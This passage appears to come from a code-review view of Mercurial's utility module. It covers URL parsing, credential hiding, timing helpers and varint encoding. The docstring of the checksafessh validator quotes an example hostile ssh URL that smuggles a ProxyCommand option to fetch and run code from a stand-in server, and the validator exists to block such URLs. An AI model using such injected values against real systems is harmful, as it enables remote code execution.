2938 2949 prefix_char = prefix[1:]
2939 2950 else:
2940 2951 prefix_char = prefix
2941 2952 mapping[prefix_char] = prefix_char
2942 2953 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2943 2954 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2944 2955
2945 2956
2946 2957 def getport(port):
2947 2958 # type: (Union[bytes, int]) -> int
2948 2959 """Return the port for a given network service.
2949 2960
2950 2961 If port is an integer, it's returned as is. If it's a string, it's
2951 2962 looked up using socket.getservbyname(). If there's no matching
2952 2963 service, error.Abort is raised.
2953 2964 """
2954 2965 try:
2955 2966 return int(port)
2956 2967 except ValueError:
2957 2968 pass
2958 2969
2959 2970 try:
2960 2971 return socket.getservbyname(pycompat.sysstr(port))
2961 2972 except socket.error:
2962 2973 raise error.Abort(
2963 2974 _(b"no port number associated with service '%s'") % port
2964 2975 )
2965 2976
2966 2977
2967 2978 class url(object):
2968 2979 r"""Reliable URL parser.
2969 2980
2970 2981 This parses URLs and provides attributes for the following
2971 2982 components:
2972 2983
2973 2984 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2974 2985
2975 2986 Missing components are set to None. The only exception is
2976 2987 fragment, which is set to '' if present but empty.
2977 2988
2978 2989 If parsefragment is False, fragment is included in query. If
2979 2990 parsequery is False, query is included in path. If both are
2980 2991 False, both fragment and query are included in path.
2981 2992
2982 2993 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2983 2994
2984 2995 Note that for backward compatibility reasons, bundle URLs do not
2985 2996 take host names. That means 'bundle://../' has a path of '../'.
2986 2997
2987 2998 Examples:
2988 2999
2989 3000 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2990 3001 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2991 3002 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2992 3003 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2993 3004 >>> url(b'file:///home/joe/repo')
2994 3005 <url scheme: 'file', path: '/home/joe/repo'>
2995 3006 >>> url(b'file:///c:/temp/foo/')
2996 3007 <url scheme: 'file', path: 'c:/temp/foo/'>
2997 3008 >>> url(b'bundle:foo')
2998 3009 <url scheme: 'bundle', path: 'foo'>
2999 3010 >>> url(b'bundle://../foo')
3000 3011 <url scheme: 'bundle', path: '../foo'>
3001 3012 >>> url(br'c:\foo\bar')
3002 3013 <url path: 'c:\\foo\\bar'>
3003 3014 >>> url(br'\\blah\blah\blah')
3004 3015 <url path: '\\\\blah\\blah\\blah'>
3005 3016 >>> url(br'\\blah\blah\blah#baz')
3006 3017 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
3007 3018 >>> url(br'file:///C:\users\me')
3008 3019 <url scheme: 'file', path: 'C:\\users\\me'>
3009 3020
3010 3021 Authentication credentials:
3011 3022
3012 3023 >>> url(b'ssh://joe:xyz@x/repo')
3013 3024 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
3014 3025 >>> url(b'ssh://joe@x/repo')
3015 3026 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
3016 3027
3017 3028 Query strings and fragments:
3018 3029
3019 3030 >>> url(b'http://host/a?b#c')
3020 3031 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3021 3032 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3022 3033 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3023 3034
3024 3035 Empty path:
3025 3036
3026 3037 >>> url(b'')
3027 3038 <url path: ''>
3028 3039 >>> url(b'#a')
3029 3040 <url path: '', fragment: 'a'>
3030 3041 >>> url(b'http://host/')
3031 3042 <url scheme: 'http', host: 'host', path: ''>
3032 3043 >>> url(b'http://host/#a')
3033 3044 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3034 3045
3035 3046 Only scheme:
3036 3047
3037 3048 >>> url(b'http:')
3038 3049 <url scheme: 'http'>
3039 3050 """
3040 3051
3041 3052 _safechars = b"!~*'()+"
3042 3053 _safepchars = b"/!~*'()+:\\"
3043 3054 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3044 3055
3045 3056 def __init__(self, path, parsequery=True, parsefragment=True):
3046 3057 # type: (bytes, bool, bool) -> None
3047 3058 # We slowly chomp away at path until we have only the path left
3048 3059 self.scheme = self.user = self.passwd = self.host = None
3049 3060 self.port = self.path = self.query = self.fragment = None
3050 3061 self._localpath = True
3051 3062 self._hostport = b''
3052 3063 self._origpath = path
3053 3064
3054 3065 if parsefragment and b'#' in path:
3055 3066 path, self.fragment = path.split(b'#', 1)
3056 3067
3057 3068 # special case for Windows drive letters and UNC paths
3058 3069 if hasdriveletter(path) or path.startswith(b'\\\\'):
3059 3070 self.path = path
3060 3071 return
3061 3072
3062 3073 # For compatibility reasons, we can't handle bundle paths as
3063 3074 # normal URLS
3064 3075 if path.startswith(b'bundle:'):
3065 3076 self.scheme = b'bundle'
3066 3077 path = path[7:]
3067 3078 if path.startswith(b'//'):
3068 3079 path = path[2:]
3069 3080 self.path = path
3070 3081 return
3071 3082
3072 3083 if self._matchscheme(path):
3073 3084 parts = path.split(b':', 1)
3074 3085 if parts[0]:
3075 3086 self.scheme, path = parts
3076 3087 self._localpath = False
3077 3088
3078 3089 if not path:
3079 3090 path = None
3080 3091 if self._localpath:
3081 3092 self.path = b''
3082 3093 return
3083 3094 else:
3084 3095 if self._localpath:
3085 3096 self.path = path
3086 3097 return
3087 3098
3088 3099 if parsequery and b'?' in path:
3089 3100 path, self.query = path.split(b'?', 1)
3090 3101 if not path:
3091 3102 path = None
3092 3103 if not self.query:
3093 3104 self.query = None
3094 3105
3095 3106 # // is required to specify a host/authority
3096 3107 if path and path.startswith(b'//'):
3097 3108 parts = path[2:].split(b'/', 1)
3098 3109 if len(parts) > 1:
3099 3110 self.host, path = parts
3100 3111 else:
3101 3112 self.host = parts[0]
3102 3113 path = None
3103 3114 if not self.host:
3104 3115 self.host = None
3105 3116 # path of file:///d is /d
3106 3117 # path of file:///d:/ is d:/, not /d:/
3107 3118 if path and not hasdriveletter(path):
3108 3119 path = b'/' + path
3109 3120
3110 3121 if self.host and b'@' in self.host:
3111 3122 self.user, self.host = self.host.rsplit(b'@', 1)
3112 3123 if b':' in self.user:
3113 3124 self.user, self.passwd = self.user.split(b':', 1)
3114 3125 if not self.host:
3115 3126 self.host = None
3116 3127
3117 3128 # Don't split on colons in IPv6 addresses without ports
3118 3129 if (
3119 3130 self.host
3120 3131 and b':' in self.host
3121 3132 and not (
3122 3133 self.host.startswith(b'[') and self.host.endswith(b']')
3123 3134 )
3124 3135 ):
3125 3136 self._hostport = self.host
3126 3137 self.host, self.port = self.host.rsplit(b':', 1)
3127 3138 if not self.host:
3128 3139 self.host = None
3129 3140
3130 3141 if (
3131 3142 self.host
3132 3143 and self.scheme == b'file'
3133 3144 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3134 3145 ):
3135 3146 raise error.Abort(
3136 3147 _(b'file:// URLs can only refer to localhost')
3137 3148 )
3138 3149
3139 3150 self.path = path
3140 3151
3141 3152 # leave the query string escaped
3142 3153 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3143 3154 v = getattr(self, a)
3144 3155 if v is not None:
3145 3156 setattr(self, a, urlreq.unquote(v))
3146 3157
3147 3158 def copy(self):
3148 3159 u = url(b'temporary useless value')
3149 3160 u.path = self.path
3150 3161 u.scheme = self.scheme
3151 3162 u.user = self.user
3152 3163 u.passwd = self.passwd
3153 3164 u.host = self.host
3154 3165 u.path = self.path
3155 3166 u.query = self.query
3156 3167 u.fragment = self.fragment
3157 3168 u._localpath = self._localpath
3158 3169 u._hostport = self._hostport
3159 3170 u._origpath = self._origpath
3160 3171 return u
3161 3172
3162 3173 @encoding.strmethod
3163 3174 def __repr__(self):
3164 3175 attrs = []
3165 3176 for a in (
3166 3177 b'scheme',
3167 3178 b'user',
3168 3179 b'passwd',
3169 3180 b'host',
3170 3181 b'port',
3171 3182 b'path',
3172 3183 b'query',
3173 3184 b'fragment',
3174 3185 ):
3175 3186 v = getattr(self, a)
3176 3187 if v is not None:
3177 3188 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3178 3189 return b'<url %s>' % b', '.join(attrs)
3179 3190
3180 3191 def __bytes__(self):
3181 3192 r"""Join the URL's components back into a URL string.
3182 3193
3183 3194 Examples:
3184 3195
3185 3196 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3186 3197 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3187 3198 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3188 3199 'http://user:pw@host:80/?foo=bar&baz=42'
3189 3200 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3190 3201 'http://user:pw@host:80/?foo=bar%3dbaz'
3191 3202 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3192 3203 'ssh://user:pw@[::1]:2200//home/joe#'
3193 3204 >>> bytes(url(b'http://localhost:80//'))
3194 3205 'http://localhost:80//'
3195 3206 >>> bytes(url(b'http://localhost:80/'))
3196 3207 'http://localhost:80/'
3197 3208 >>> bytes(url(b'http://localhost:80'))
3198 3209 'http://localhost:80/'
3199 3210 >>> bytes(url(b'bundle:foo'))
3200 3211 'bundle:foo'
3201 3212 >>> bytes(url(b'bundle://../foo'))
3202 3213 'bundle:../foo'
3203 3214 >>> bytes(url(b'path'))
3204 3215 'path'
3205 3216 >>> bytes(url(b'file:///tmp/foo/bar'))
3206 3217 'file:///tmp/foo/bar'
3207 3218 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3208 3219 'file:///c:/tmp/foo/bar'
3209 3220 >>> print(url(br'bundle:foo\bar'))
3210 3221 bundle:foo\bar
3211 3222 >>> print(url(br'file:///D:\data\hg'))
3212 3223 file:///D:\data\hg
3213 3224 """
3214 3225 if self._localpath:
3215 3226 s = self.path
3216 3227 if self.scheme == b'bundle':
3217 3228 s = b'bundle:' + s
3218 3229 if self.fragment:
3219 3230 s += b'#' + self.fragment
3220 3231 return s
3221 3232
3222 3233 s = self.scheme + b':'
3223 3234 if self.user or self.passwd or self.host:
3224 3235 s += b'//'
3225 3236 elif self.scheme and (
3226 3237 not self.path
3227 3238 or self.path.startswith(b'/')
3228 3239 or hasdriveletter(self.path)
3229 3240 ):
3230 3241 s += b'//'
3231 3242 if hasdriveletter(self.path):
3232 3243 s += b'/'
3233 3244 if self.user:
3234 3245 s += urlreq.quote(self.user, safe=self._safechars)
3235 3246 if self.passwd:
3236 3247 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3237 3248 if self.user or self.passwd:
3238 3249 s += b'@'
3239 3250 if self.host:
3240 3251 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3241 3252 s += urlreq.quote(self.host)
3242 3253 else:
3243 3254 s += self.host
3244 3255 if self.port:
3245 3256 s += b':' + urlreq.quote(self.port)
3246 3257 if self.host:
3247 3258 s += b'/'
3248 3259 if self.path:
3249 3260 # TODO: similar to the query string, we should not unescape the
3250 3261 # path when we store it, the path might contain '%2f' = '/',
3251 3262 # which we should *not* escape.
3252 3263 s += urlreq.quote(self.path, safe=self._safepchars)
3253 3264 if self.query:
3254 3265 # we store the query in escaped form.
3255 3266 s += b'?' + self.query
3256 3267 if self.fragment is not None:
3257 3268 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3258 3269 return s
3259 3270
3260 3271 __str__ = encoding.strmethod(__bytes__)
3261 3272
3262 3273 def authinfo(self):
3263 3274 user, passwd = self.user, self.passwd
3264 3275 try:
3265 3276 self.user, self.passwd = None, None
3266 3277 s = bytes(self)
3267 3278 finally:
3268 3279 self.user, self.passwd = user, passwd
3269 3280 if not self.user:
3270 3281 return (s, None)
3271 3282 # authinfo[1] is passed to urllib2 password manager, and its
3272 3283 # URIs must not contain credentials. The host is passed in the
3273 3284 # URIs list because Python < 2.4.3 uses only that to search for
3274 3285 # a password.
3275 3286 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3276 3287
3277 3288 def isabs(self):
3278 3289 if self.scheme and self.scheme != b'file':
3279 3290 return True # remote URL
3280 3291 if hasdriveletter(self.path):
3281 3292 return True # absolute for our purposes - can't be joined()
3282 3293 if self.path.startswith(br'\\'):
3283 3294 return True # Windows UNC path
3284 3295 if self.path.startswith(b'/'):
3285 3296 return True # POSIX-style
3286 3297 return False
3287 3298
3288 3299 def localpath(self):
3289 3300 # type: () -> bytes
3290 3301 if self.scheme == b'file' or self.scheme == b'bundle':
3291 3302 path = self.path or b'/'
3292 3303 # For Windows, we need to promote hosts containing drive
3293 3304 # letters to paths with drive letters.
3294 3305 if hasdriveletter(self._hostport):
3295 3306 path = self._hostport + b'/' + self.path
3296 3307 elif (
3297 3308 self.host is not None and self.path and not hasdriveletter(path)
3298 3309 ):
3299 3310 path = b'/' + path
3300 3311 return path
3301 3312 return self._origpath
3302 3313
3303 3314 def islocal(self):
3304 3315 '''whether localpath will return something that posixfile can open'''
3305 3316 return (
3306 3317 not self.scheme
3307 3318 or self.scheme == b'file'
3308 3319 or self.scheme == b'bundle'
3309 3320 )
3310 3321
3311 3322
3312 3323 def hasscheme(path):
3313 3324 # type: (bytes) -> bool
3314 3325 return bool(url(path).scheme) # cast to help pytype
3315 3326
3316 3327
3317 3328 def hasdriveletter(path):
3318 3329 # type: (bytes) -> bool
3319 3330 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
3320 3331
3321 3332
3322 3333 def urllocalpath(path):
3323 3334 # type: (bytes) -> bytes
3324 3335 return url(path, parsequery=False, parsefragment=False).localpath()
3325 3336
3326 3337
3327 3338 def checksafessh(path):
3328 3339 # type: (bytes) -> None
3329 3340 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3330 3341
3331 3342 This is a sanity check for ssh urls. ssh will parse the first item as
3332 3343 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3333 3344 Let's prevent these potentially exploited urls entirely and warn the
3334 3345 user.
3335 3346
3336 3347 Raises an error.Abort when the url is unsafe.
3337 3348 """
3338 3349 path = urlreq.unquote(path)
3339 3350 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3340 3351 raise error.Abort(
3341 3352 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3342 3353 )
3343 3354
3344 3355
3345 3356 def hidepassword(u):
3346 3357 # type: (bytes) -> bytes
3347 3358 '''hide user credential in a url string'''
3348 3359 u = url(u)
3349 3360 if u.passwd:
3350 3361 u.passwd = b'***'
3351 3362 return bytes(u)
3352 3363
3353 3364
3354 3365 def removeauth(u):
3355 3366 # type: (bytes) -> bytes
3356 3367 '''remove all authentication information from a url string'''
3357 3368 u = url(u)
3358 3369 u.user = u.passwd = None
3359 3370 return bytes(u)
3360 3371
3361 3372
3362 3373 timecount = unitcountfn(
3363 3374 (1, 1e3, _(b'%.0f s')),
3364 3375 (100, 1, _(b'%.1f s')),
3365 3376 (10, 1, _(b'%.2f s')),
3366 3377 (1, 1, _(b'%.3f s')),
3367 3378 (100, 0.001, _(b'%.1f ms')),
3368 3379 (10, 0.001, _(b'%.2f ms')),
3369 3380 (1, 0.001, _(b'%.3f ms')),
3370 3381 (100, 0.000001, _(b'%.1f us')),
3371 3382 (10, 0.000001, _(b'%.2f us')),
3372 3383 (1, 0.000001, _(b'%.3f us')),
3373 3384 (100, 0.000000001, _(b'%.1f ns')),
3374 3385 (10, 0.000000001, _(b'%.2f ns')),
3375 3386 (1, 0.000000001, _(b'%.3f ns')),
3376 3387 )
3377 3388
3378 3389
3379 3390 @attr.s
3380 3391 class timedcmstats(object):
3381 3392 """Stats information produced by the timedcm context manager on entering."""
3382 3393
3383 3394 # the starting value of the timer as a float (meaning and resulution is
3384 3395 # platform dependent, see util.timer)
3385 3396 start = attr.ib(default=attr.Factory(lambda: timer()))
3386 3397 # the number of seconds as a floating point value; starts at 0, updated when
3387 3398 # the context is exited.
3388 3399 elapsed = attr.ib(default=0)
3389 3400 # the number of nested timedcm context managers.
3390 3401 level = attr.ib(default=1)
3391 3402
3392 3403 def __bytes__(self):
3393 3404 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3394 3405
3395 3406 __str__ = encoding.strmethod(__bytes__)
3396 3407
3397 3408
3398 3409 @contextlib.contextmanager
3399 3410 def timedcm(whencefmt, *whenceargs):
3400 3411 """A context manager that produces timing information for a given context.
3401 3412
3402 3413 On entering a timedcmstats instance is produced.
3403 3414
3404 3415 This context manager is reentrant.
3405 3416
3406 3417 """
3407 3418 # track nested context managers
3408 3419 timedcm._nested += 1
3409 3420 timing_stats = timedcmstats(level=timedcm._nested)
3410 3421 try:
3411 3422 with tracing.log(whencefmt, *whenceargs):
3412 3423 yield timing_stats
3413 3424 finally:
3414 3425 timing_stats.elapsed = timer() - timing_stats.start
3415 3426 timedcm._nested -= 1
3416 3427
3417 3428
3418 3429 timedcm._nested = 0
3419 3430
3420 3431
3421 3432 def timed(func):
3422 3433 """Report the execution time of a function call to stderr.
3423 3434
3424 3435 During development, use as a decorator when you need to measure
3425 3436 the cost of a function, e.g. as follows:
3426 3437
3427 3438 @util.timed
3428 3439 def foo(a, b, c):
3429 3440 pass
3430 3441 """
3431 3442
3432 3443 def wrapper(*args, **kwargs):
3433 3444 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3434 3445 result = func(*args, **kwargs)
3435 3446 stderr = procutil.stderr
3436 3447 stderr.write(
3437 3448 b'%s%s: %s\n'
3438 3449 % (
3439 3450 b' ' * time_stats.level * 2,
3440 3451 pycompat.bytestr(func.__name__),
3441 3452 time_stats,
3442 3453 )
3443 3454 )
3444 3455 return result
3445 3456
3446 3457 return wrapper
3447 3458
3448 3459
3449 3460 _sizeunits = (
3450 3461 (b'm', 2 ** 20),
3451 3462 (b'k', 2 ** 10),
3452 3463 (b'g', 2 ** 30),
3453 3464 (b'kb', 2 ** 10),
3454 3465 (b'mb', 2 ** 20),
3455 3466 (b'gb', 2 ** 30),
3456 3467 (b'b', 1),
3457 3468 )
3458 3469
3459 3470
3460 3471 def sizetoint(s):
3461 3472 # type: (bytes) -> int
3462 3473 """Convert a space specifier to a byte count.
3463 3474
3464 3475 >>> sizetoint(b'30')
3465 3476 30
3466 3477 >>> sizetoint(b'2.2kb')
3467 3478 2252
3468 3479 >>> sizetoint(b'6M')
3469 3480 6291456
3470 3481 """
3471 3482 t = s.strip().lower()
3472 3483 try:
3473 3484 for k, u in _sizeunits:
3474 3485 if t.endswith(k):
3475 3486 return int(float(t[: -len(k)]) * u)
3476 3487 return int(t)
3477 3488 except ValueError:
3478 3489 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3479 3490
3480 3491
3481 3492 class hooks(object):
3482 3493 """A collection of hook functions that can be used to extend a
3483 3494 function's behavior. Hooks are called in lexicographic order,
3484 3495 based on the names of their sources."""
3485 3496
3486 3497 def __init__(self):
3487 3498 self._hooks = []
3488 3499
3489 3500 def add(self, source, hook):
3490 3501 self._hooks.append((source, hook))
3491 3502
3492 3503 def __call__(self, *args):
3493 3504 self._hooks.sort(key=lambda x: x[0])
3494 3505 results = []
3495 3506 for source, hook in self._hooks:
3496 3507 results.append(hook(*args))
3497 3508 return results
3498 3509
3499 3510
3500 3511 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3501 3512 """Yields lines for a nicely formatted stacktrace.
3502 3513 Skips the 'skip' last entries, then return the last 'depth' entries.
3503 3514 Each file+linenumber is formatted according to fileline.
3504 3515 Each line is formatted according to line.
3505 3516 If line is None, it yields:
3506 3517 length of longest filepath+line number,
3507 3518 filepath+linenumber,
3508 3519 function
3509 3520
3510 3521 Not be used in production code but very convenient while developing.
3511 3522 """
3512 3523 entries = [
3513 3524 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3514 3525 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3515 3526 ][-depth:]
3516 3527 if entries:
3517 3528 fnmax = max(len(entry[0]) for entry in entries)
3518 3529 for fnln, func in entries:
3519 3530 if line is None:
3520 3531 yield (fnmax, fnln, func)
3521 3532 else:
3522 3533 yield line % (fnmax, fnln, func)
3523 3534
3524 3535
3525 3536 def debugstacktrace(
3526 3537 msg=b'stacktrace',
3527 3538 skip=0,
3528 3539 f=procutil.stderr,
3529 3540 otherf=procutil.stdout,
3530 3541 depth=0,
3531 3542 prefix=b'',
3532 3543 ):
3533 3544 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3534 3545 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3535 3546 By default it will flush stdout first.
3536 3547 It can be used everywhere and intentionally does not require an ui object.
3537 3548 Not be used in production code but very convenient while developing.
3538 3549 """
3539 3550 if otherf:
3540 3551 otherf.flush()
3541 3552 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3542 3553 for line in getstackframes(skip + 1, depth=depth):
3543 3554 f.write(prefix + line)
3544 3555 f.flush()
3545 3556
3546 3557
3547 3558 # convenient shortcut
3548 3559 dst = debugstacktrace
3549 3560
3550 3561
3551 3562 def safename(f, tag, ctx, others=None):
3552 3563 """
3553 3564 Generate a name that it is safe to rename f to in the given context.
3554 3565
3555 3566 f: filename to rename
3556 3567 tag: a string tag that will be included in the new name
3557 3568 ctx: a context, in which the new name must not exist
3558 3569 others: a set of other filenames that the new name must not be in
3559 3570
3560 3571 Returns a file name of the form oldname~tag[~number] which does not exist
3561 3572 in the provided context and is not in the set of other names.
3562 3573 """
3563 3574 if others is None:
3564 3575 others = set()
3565 3576
3566 3577 fn = b'%s~%s' % (f, tag)
3567 3578 if fn not in ctx and fn not in others:
3568 3579 return fn
3569 3580 for n in itertools.count(1):
3570 3581 fn = b'%s~%s~%s' % (f, tag, n)
3571 3582 if fn not in ctx and fn not in others:
3572 3583 return fn
3573 3584
3574 3585
3575 3586 def readexactly(stream, n):
3576 3587 '''read n bytes from stream.read and abort if less was available'''
3577 3588 s = stream.read(n)
3578 3589 if len(s) < n:
3579 3590 raise error.Abort(
3580 3591 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3581 3592 % (len(s), n)
3582 3593 )
3583 3594 return s
3584 3595
3585 3596
3586 3597 def uvarintencode(value):
3587 3598 """Encode an unsigned integer value to a varint.
3588 3599
3589 3600 A varint is a variable length integer of 1 or more bytes. Each byte
3590 3601 except the last has the most significant bit set. The lower 7 bits of
3591 3602 each byte store the 2's complement representation, least significant group
3592 3603 first.
3593 3604
3594 3605 >>> uvarintencode(0)
3595 3606 '\\x00'
3596 3607 >>> uvarintencode(1)
3597 3608 '\\x01'
3598 3609 >>> uvarintencode(127)
3599 3610 '\\x7f'
3600 3611 >>> uvarintencode(1337)
3601 3612 '\\xb9\\n'
3602 3613 >>> uvarintencode(65536)
3603 3614 '\\x80\\x80\\x04'
3604 3615 >>> uvarintencode(-1)
3605 3616 Traceback (most recent call last):
3606 3617 ...
3607 3618 ProgrammingError: negative value for uvarint: -1
3608 3619 """
3609 3620 if value < 0:
3610 3621 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3611 3622 bits = value & 0x7F
3612 3623 value >>= 7
3613 3624 bytes = []
3614 3625 while value:
3615 3626 bytes.append(pycompat.bytechr(0x80 | bits))
3616 3627 bits = value & 0x7F
3617 3628 value >>= 7
3618 3629 bytes.append(pycompat.bytechr(bits))
3619 3630
3620 3631 return b''.join(bytes)
3621 3632
3622 3633
3623 3634 def uvarintdecodestream(fh):
3624 3635 """Decode an unsigned variable length integer from a stream.
3625 3636
3626 3637 The passed argument is anything that has a ``.read(N)`` method.
3627 3638
3628 3639 >>> try:
3629 3640 ... from StringIO import StringIO as BytesIO
3630 3641 ... except ImportError:
3631 3642 ... from io import BytesIO
3632 3643 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3633 3644 0
3634 3645 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3635 3646 1
3636 3647 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3637 3648 127
3638 3649 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3639 3650 1337
3640 3651 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3641 3652 65536
3642 3653 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3643 3654 Traceback (most recent call last):
3644 3655 ...
3645 3656 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3646 3657 """
3647 3658 result = 0
3648 3659 shift = 0
3649 3660 while True:
3650 3661 byte = ord(readexactly(fh, 1))
3651 3662 result |= (byte & 0x7F) << shift
3652 3663 if not (byte & 0x80):
3653 3664 return result
3654 3665 shift += 7
3655 3666
3656 3667
3657 3668 # Passing the '' locale means that the locale should be set according to the
3658 3669 # user settings (environment variables).
3659 3670 # Python sometimes avoids setting the global locale settings. When interfacing
3660 3671 # with C code (e.g. the curses module or the Subversion bindings), the global
3661 3672 # locale settings must be initialized correctly. Python 2 does not initialize
3662 3673 # the global locale settings on interpreter startup. Python 3 sometimes
3663 3674 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3664 3675 # explicitly initialize it to get consistent behavior if it's not already
3665 3676 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3666 3677 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3667 3678 # if we can remove this code.
3668 3679 @contextlib.contextmanager
3669 3680 def with_lc_ctype():
3670 3681 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3671 3682 if oldloc == 'C':
3672 3683 try:
3673 3684 try:
3674 3685 locale.setlocale(locale.LC_CTYPE, '')
3675 3686 except locale.Error:
3676 3687 # The likely case is that the locale from the environment
3677 3688 # variables is unknown.
3678 3689 pass
3679 3690 yield
3680 3691 finally:
3681 3692 locale.setlocale(locale.LC_CTYPE, oldloc)
3682 3693 else:
3683 3694 yield
3684 3695
3685 3696
3686 3697 def _estimatememory():
3687 3698 # type: () -> Optional[int]
3688 3699 """Provide an estimate for the available system memory in Bytes.
3689 3700
3690 3701 If no estimate can be provided on the platform, returns None.
3691 3702 """
3692 3703 if pycompat.sysplatform.startswith(b'win'):
3693 3704 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3694 3705 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3695 3706 from ctypes.wintypes import ( # pytype: disable=import-error
3696 3707 Structure,
3697 3708 byref,
3698 3709 sizeof,
3699 3710 windll,
3700 3711 )
3701 3712
3702 3713 class MEMORYSTATUSEX(Structure):
3703 3714 _fields_ = [
3704 3715 ('dwLength', DWORD),
3705 3716 ('dwMemoryLoad', DWORD),
3706 3717 ('ullTotalPhys', DWORDLONG),
3707 3718 ('ullAvailPhys', DWORDLONG),
3708 3719 ('ullTotalPageFile', DWORDLONG),
3709 3720 ('ullAvailPageFile', DWORDLONG),
3710 3721 ('ullTotalVirtual', DWORDLONG),
3711 3722 ('ullAvailVirtual', DWORDLONG),
3712 3723 ('ullExtendedVirtual', DWORDLONG),
3713 3724 ]
3714 3725
3715 3726 x = MEMORYSTATUSEX()
3716 3727 x.dwLength = sizeof(x)
3717 3728 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3718 3729 return x.ullAvailPhys
3719 3730
3720 3731 # On newer Unix-like systems and Mac OSX, the sysconf interface
3721 3732 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3722 3733 # seems to be implemented on most systems.
3723 3734 try:
3724 3735 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3725 3736 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3726 3737 return pagesize * pages
3727 3738 except OSError: # sysconf can fail
3728 3739 pass
3729 3740 except KeyError: # unknown parameter
3730 3741 pass
General Comments 0
You need to be logged in to leave comments. Login now